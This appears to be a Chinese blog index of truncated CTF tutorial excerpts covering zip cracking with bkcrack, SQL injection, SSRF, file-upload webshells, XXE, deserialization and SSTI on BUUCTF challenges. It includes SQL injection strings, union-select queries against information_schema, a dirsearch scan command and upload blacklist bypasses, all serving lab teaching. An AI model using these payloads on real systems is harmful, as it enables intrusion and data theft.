快速入门misc及buuctf西电题解
快速入门misc及buuctf西电题解bf6题解:1.压缩包,放kali,有png,用bk 2.准备png开头 明文文件 echo 开头码 | xxd -r ps > 明文文件 3.得到密钥 bkcrack -C -c -p -o 4.解密压缩文件 bkcrack -C -c -k -d 5.发现图片有隐藏的10编码,steg打开得到乱码,图片comment里面有密钥,解码后flag 二维码1一个完整的 JPG 文件由 FF D8 开头,FF D9结尾 在使用图片浏览器时,图片浏览器会忽略 FF D9 以后的内容,因此可以在 JPG 文件中加入其他文件。其他文件隐藏如png.gif文件隐藏也是这个道理。 123456789101112131415161718192021222324252627282930313233343536373839# ========== 前期定位工具 & 切换工作目录 ==========# 1. (尝试找bkcrack目录失败,改用全局查找工具路径)which bkcrack # 确认bkcrack路径:/usr/local/bin/...
快速入门web方向buuctf+mo
快速入门web方向buuctf+moectf解题过程sql注入1.账号密码登陆题目 方法一:万能账户密码判断闭合方式后就可以套公式啦 sql语句:1.原本:随便输入 1SELECT*FROM table_name WHERE username=' a' and password='123'; 2.我们要做的: 1SELECT*FROM table_name WHERE username=' a' or ture # ' and password='123'; 当输入 a’ or ture #整句话会被解析成: 1xx一堆被闭合的垃圾话xx or ture (一个成立即为真) where条件为真,执行最前面select语句 那么就通关了 这里有一个问题:为什么账号和密码只要一个填了万能公式就可以成功?你先想一下:账号填了这个万能公式,密码填的明明是错的为什么可以对? 1SELECT*FROM table_name WHERE usern...
快速入门web-sql注入及buuctf西电题解
快速入门web-sql注入及buuctf西电题解08 第八章 天衍真言,星图显圣 题解1.判断字段数order by 2 2.判断回显位 ‘union select 1,2# Welcome 1 3.数据库名 ‘union select database()# Welcome user 4.尝试查询数据库名为user下的所有表名 ‘union select group_concat(table_name),2 from information_schema.tables where table_schema=’user’# Welcome flag,users 5.尝试查询 数据库名为user,表名为flag 下的所有列名 ‘union select group_concat(column_name),2 from information_schema.columns where table_schema=’user’ and table_name=’flag’# Welcome value 6.查找数据 错误答案:’union select va...
快速入门web-ssrf及buuctf西电题解
快速入门web-ssrf及buuctf西电题解SSRF = 服务器端请求伪造特点 主体是服务器:请求是「服务器发起」的,不是你的电脑; 权限是服务器的权限:服务器能访问的资源(本地文件、内网 IP),你本来访问不到,但通过 SSRF 就能间接访问; 核心是 “伪造请求”:你伪造一个服务器会执行的请求(比如本地文件地址、内网地址),服务器替你执行。 [网鼎杯 2018]Fakebook11.注册登陆界面,sqlmap扫描 1python dirsearch.py -u "http://3992b9c4-b99e-44db-96b6-111d3cb92681.node5.buuoj.cn:81/" -e php --threads 1 --delay 3 -w ./ctf_core.txt 打开备份文件 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phpclass UserInfo{ public $na...
快速入门web-逻辑漏洞及buuctf西电题解
快速入门web-逻辑漏洞及buuctf西电题解[极客大挑战 2019]BuyFlag1题目:我一开始是想去把xff改成学校的特定内网ip,发现根本没有用,因为你不知道ip是啥啊 123456789101112FlagFlag need your 100000000 moneyattentionIf you want to buy the FLAG:You must be a student from CUIT!!!You must be answer the correct password!!!Only Cuit's students can buy the FLAG 由题,没思路,看源码 1234567891011<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "pas...
快速入门web-信息泄露收集及buuctf西电题解
快速入门web-信息泄露收集及buuctf西电题解buuctf 禁止套娃1.找不到flag,没有思路,dir扫描 git泄露 2.githack工具获取源码 3.代码分析 123456789101112131415161718192021222324252627<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { //preg_replace(正则, NULL, $_GET['exp']) ->把输入中正则部分给删掉 if(';' === preg_replace('/[a...
快速入门web-文件上传+包含及buuctf西电题解
快速入门web-文件上传+包含及buuctf西电题解知识点: 1.include 是什么include "/flag";include 原本的设计目的是为了让你把写好的 PHP 代码(比如头部导航栏)拼接到当前页面里。 但是,如果你让它去 include 一个不是 PHP 代码的文件(比如 /flag),它会发生一个非常有趣的现象: 它发现这玩意儿不是代码:PHP 引擎打开 /flag,一看开头没有 <?php。 它直接原样输出:PHP 觉得“既然这不是代码,那我就把它当成普通的 HTML 文字,直接显示在网页上吧”。 结果: 你的 Flag 就这样被“顺便”打印在了屏幕上。 [第二章 web进阶]文件上传 1 文件上传漏洞 题解1.上传webshell.jpg文件 2.发现上传成功却无法打开 是因为上传的目录是随机的,所以用御剑扫描即可,找到对应网页 打开 [ACTF2020 新生赛]Upload 1十分波折的一道题目哈 1.文件上传php,失败,显示只能jpg等一堆正常格式 2.上传木马jpg,改成php,nonono 3.那改成phtml?黑名单绕...
快速入门xml在ctf中的运用及知识点
快速入门xml在ctf中的运用及知识点 DOCTYPE(文档类型定义的声明) ENTITY(实体的声明) SYSTEM、PUBLIC(外部资源申请) 123456内部实体<!ENTITY 实体名称 "实体值">外部实体<!ENTITY 实体名称 SYSTEM "URL"> 10 第十章 天机符阵_revenge随便输入,得到: 12345<br /><b>Warning</b>: DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1 in <b>/var/www/html/chapter10.php</b> on line <b>17</b><br /><阵枢>引魂玉</阵枢><解析>未定义</解析><输出>...
快速入门字符串逃逸——序列化和反序列化(未完待续)
快速入门字符串逃逸——序列化和反序列化(未完待续)大家经常会在代码审议的时候看到unserialize() 或许有些人会跟我一样没有仔细深入的了解它,只是会运用它而已。 那么为了我们以后的学习和记忆我们还是得要认识一下这个老客户的。 第一篇unserialize()1.读取规则——php是怎么读取它的内容的?例子:把php想象成扫描仪 a:1:{s:4:"name";s:3:"cat";} 看到 a:1:扫描仪进入“数组模式”,它心里记下:“我要找 1 对键值对”。 看到 {:开始读数组内部。 看到 s:4:进入“字符串读取模式”。重点来了: 看到数字 4 后,它会找引号 "。 从引号后的第一个字符开始,它往后数 4 个字节。 数完 4 个后:它睁开眼,必须看到一个收尾的引号 "。如果没看到,直接报错;如果看到了,这个字符串读取成功。 看到 ;:表示这个字段结束,准备读下一个。 衍生知识点1.那我们这里就可以涉及一个知识点——反序列化逃逸1s:N....... 若遇到 字符串替换 ,那么我们的php会怎么...
快速入门ssti模板注入及ctf题解
快速入门ssti模板注入及ctf题解模板注入初步¶ ProbiusOfficial/Hello-CTF 前置知识¶在开始之前,我们先大概介绍一下什么是模板,什么又是模板注入。 什么是模板¶模板 是一种用于生成动态内容的工具。 它们通常包含两个基本部分: 比如下图为 Hello-CTFtime 项目中,渲染比赛列表的时候用到的模板: 绿色 部分为 静态内容 ,而 橙色 部分则是 动态占位符 大多数模板的工作流程: 定义模板 -> 传递数据 -> 渲染模板 -> 输出生成 什么是模板注入¶我们之前在说SQL注入的时候,这样描述SQL注入 “通过可控输入点达到非预期执行数据库语句”,比如后台预期的语句是: 1SELECT username,password FROM users WHERE id = "数据传递点" 在预期情况下,数据传递点只会是 1,2,3,4…… 但是我们要是让数据传入点的值为 1" union select 1,group_concat(schema_name) from inform...